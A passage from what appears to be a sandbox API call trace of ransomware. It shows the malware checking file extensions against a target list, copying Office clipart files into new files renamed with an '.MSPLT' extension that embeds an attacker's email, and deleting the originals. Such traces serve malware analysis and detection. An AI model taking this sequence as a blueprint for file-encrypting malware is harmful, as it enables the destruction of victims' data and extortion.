lpString2=".WMF") returned -1 [0299.754] lstrlenW (lpString=".docx") returned 5 [0299.754] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.754] lstrlenW (lpString=".pdf") returned 4 [0299.754] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.754] lstrlenW (lpString=".xls") returned 4 [0299.754] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.754] lstrlenW (lpString=".xlsx") returned 5 [0299.754] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.754] lstrlenW (lpString=".ppt") returned 4 [0299.754] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.754] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0299.754] lstrlenW (lpString=".zip") returned 4 [0300.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0300.170] lstrlenW (lpString=".rar") returned 4 [0300.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0300.170] lstrlenW (lpString=".bz2") returned 4 [0300.170] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0300.170] lstrlenW (lpString=".7z") returned 3 [0300.170] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0300.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.170] lstrlenW (lpString=".dbf") returned 4 [0300.170] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0300.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.170] lstrlenW (lpString=".1cd") returned 4 [0300.170] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0300.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.170] lstrlenW (lpString=".jpg") returned 4 [0300.170] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0300.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.170] lstrlenW (lpString=".doc") returned 4 [0300.170] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0300.170] lstrlenW (lpString=".docx") returned 5 [0300.170] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0300.170] lstrlenW (lpString=".pdf") returned 4 [0300.170] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0300.170] lstrlenW (lpString=".xls") returned 4 [0300.171] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0300.171] lstrlenW (lpString=".xlsx") returned 5 [0300.171] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0300.171] lstrlenW (lpString=".ppt") returned 4 [0300.171] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0300.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.171] lstrlenW (lpString=".zip") returned 4 [0300.171] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0300.171] lstrlenW (lpString=".rar") returned 4 [0300.171] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0300.171] lstrlenW (lpString=".bz2") returned 4 [0300.171] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0300.171] lstrlenW (lpString=".7z") returned 3 [0300.171] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0300.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.171] lstrlenW (lpString=".dbf") returned 4 [0300.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0300.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.171] lstrlenW (lpString=".1cd") returned 4 [0300.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0300.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00248_.WMF") returned 68 [0300.171] lstrlenW (lpString=".jpg") returned 4 [0300.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0300.172] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0300.172] lstrlenW (lpString="BL00261_.WMF") returned 12 [0300.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d4 [0301.112] GetFileSizeEx (in: hFile=0x4d4, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=12482) returned 1 [0301.112] CloseHandle (hObject=0x4d4) returned 1 [0301.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf")) returned 0x220 [0301.570] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0301.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.587] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.587] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4ec [0301.588] GetLastError () returned 0x0 [0301.588] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x30c2, lpOverlapped=0x0) returned 1 [0301.591] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x30d0, lpOverlapped=0x0) returned 1 [0301.593] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0301.593] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0301.593] SetEndOfFile (hFile=0x4ec) returned 1 [0301.593] CloseHandle (hObject=0x4ec) returned 1 [0301.596] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.596] SetEndOfFile (hFile=0x4e8) returned 1 [0301.600] CloseHandle (hObject=0x4e8) returned 1 [0301.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0301.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00261_.wmf")) returned 1 [0301.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.602] lstrlenW (lpString=".doc") returned 4 [0301.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0301.602] lstrlenW (lpString=".docx") returned 5 [0301.602] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0301.602] lstrlenW (lpString=".pdf") returned 4 [0301.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0301.602] lstrlenW (lpString=".xls") returned 4 [0301.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0301.602] lstrlenW (lpString=".xlsx") returned 5 [0301.602] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0301.602] lstrlenW (lpString=".ppt") returned 4 [0301.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0301.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.602] lstrlenW (lpString=".zip") returned 4 [0301.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0301.602] lstrlenW (lpString=".rar") returned 4 [0301.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0301.602] lstrlenW (lpString=".bz2") returned 4 [0301.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0301.602] lstrlenW (lpString=".7z") returned 3 [0301.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0301.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.602] lstrlenW (lpString=".dbf") returned 4 [0301.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0301.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.602] lstrlenW (lpString=".1cd") returned 4 [0301.602] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0301.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.602] lstrlenW (lpString=".jpg") returned 4 [0301.603] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0301.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.603] lstrlenW (lpString=".doc") returned 4 [0301.603] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0301.603] lstrlenW (lpString=".docx") returned 5 [0301.603] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0301.603] lstrlenW (lpString=".pdf") returned 4 [0301.603] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0301.603] lstrlenW (lpString=".xls") returned 4 [0301.603] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0301.603] lstrlenW (lpString=".xlsx") returned 5 [0301.603] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0301.603] lstrlenW (lpString=".ppt") returned 4 [0301.603] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0301.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.603] lstrlenW (lpString=".zip") returned 4 [0301.603] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0301.603] lstrlenW (lpString=".rar") returned 4 [0301.603] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0301.603] lstrlenW (lpString=".bz2") returned 4 [0301.603] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0301.603] lstrlenW (lpString=".7z") returned 3 [0301.603] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0301.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.603] lstrlenW (lpString=".dbf") returned 4 [0301.603] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0301.603] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.604] lstrlenW (lpString=".1cd") returned 4 [0301.604] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0301.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 68 [0301.604] lstrlenW (lpString=".jpg") returned 4 [0301.604] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0301.604] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0301.604] lstrlenW (lpString="BL00267_.WMF") returned 12 [0301.604] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.605] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=2644) returned 1 [0301.605] CloseHandle (hObject=0x4e8) returned 1 [0301.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf")) returned 0x220 [0301.605] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0301.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.606] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.606] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4ec [0301.607] GetLastError () returned 0x0 [0301.607] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xa54, lpOverlapped=0x0) returned 1 [0301.609] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xa60, lpOverlapped=0x0) returned 1 [0301.610] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0301.610] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0301.610] SetEndOfFile (hFile=0x4ec) returned 1 [0301.610] CloseHandle (hObject=0x4ec) returned 1 [0301.612] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.612] SetEndOfFile (hFile=0x4e8) returned 1 [0301.615] CloseHandle (hObject=0x4e8) returned 1 [0301.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0301.616] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00267_.wmf")) returned 1 [0301.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.616] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.616] lstrlenW (lpString=".doc") returned 4 [0301.616] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString=".docx") returned 5 [0301.617] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0301.617] lstrlenW (lpString=".pdf") returned 4 [0301.617] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString=".xls") returned 4 [0301.617] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0301.617] lstrlenW (lpString=".xlsx") returned 5 [0301.617] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0301.617] lstrlenW (lpString=".ppt") returned 4 [0301.617] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.617] lstrlenW (lpString=".zip") returned 4 [0301.617] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0301.617] lstrlenW (lpString=".rar") returned 4 [0301.617] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString=".bz2") returned 4 [0301.617] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString=".7z") returned 3 [0301.617] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0301.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.617] lstrlenW (lpString=".dbf") returned 4 [0301.617] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.617] lstrlenW (lpString=".1cd") returned 4 [0301.617] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.617] lstrlenW (lpString=".jpg") returned 4 [0301.617] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.617] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.617] lstrlenW (lpString=".doc") returned 4 [0301.617] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0301.617] lstrlenW (lpString=".docx") returned 5 [0301.617] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0301.618] lstrlenW (lpString=".pdf") returned 4 [0301.618] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0301.618] lstrlenW (lpString=".xls") returned 4 [0301.618] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0301.618] lstrlenW (lpString=".xlsx") returned 5 [0301.618] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0301.618] lstrlenW (lpString=".ppt") returned 4 [0301.618] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0301.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.618] lstrlenW (lpString=".zip") returned 4 [0301.618] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0301.618] lstrlenW (lpString=".rar") returned 4 [0301.618] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0301.618] lstrlenW (lpString=".bz2") returned 4 [0301.618] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0301.618] lstrlenW (lpString=".7z") returned 3 [0301.618] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0301.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.618] lstrlenW (lpString=".dbf") returned 4 [0301.618] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0301.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.618] lstrlenW (lpString=".1cd") returned 4 [0301.618] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0301.618] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 68 [0301.618] lstrlenW (lpString=".jpg") returned 4 [0301.618] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0301.618] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0301.619] lstrlenW (lpString="BL00269_.WMF") returned 12 [0301.619] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.619] GetFileSizeEx (in: hFile=0x4e8, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=5272) returned 1 [0301.619] CloseHandle (hObject=0x4e8) returned 1 [0301.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf")) returned 0x220 [0301.620] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0301.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4e8 [0301.620] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.620] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0301.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4ec [0301.621] GetLastError () returned 0x0 [0301.621] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x1498, lpOverlapped=0x0) returned 1 [0303.505] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x14a0, lpOverlapped=0x0) returned 1 [0303.507] ReadFile (in: hFile=0x4e8, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0303.507] WriteFile (in: hFile=0x4ec, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0303.507] SetEndOfFile (hFile=0x4ec) returned 1 [0303.508] CloseHandle (hObject=0x4ec) returned 1 [0303.516] SetFilePointerEx (in: hFile=0x4e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0303.517] SetEndOfFile (hFile=0x4e8) returned 1 [0303.523] CloseHandle (hObject=0x4e8) returned 1 [0303.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0303.524] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00269_.wmf")) returned 1 [0303.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.525] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 68 [0303.525] lstrlenW (lpString=".doc") returned 4 [0303.525] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0303.525] lstrlenW (lpString=".docx") returned 5 [0303.525] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0303.526] lstrlenW (lpString=".pdf") returned 4 [0303.526] 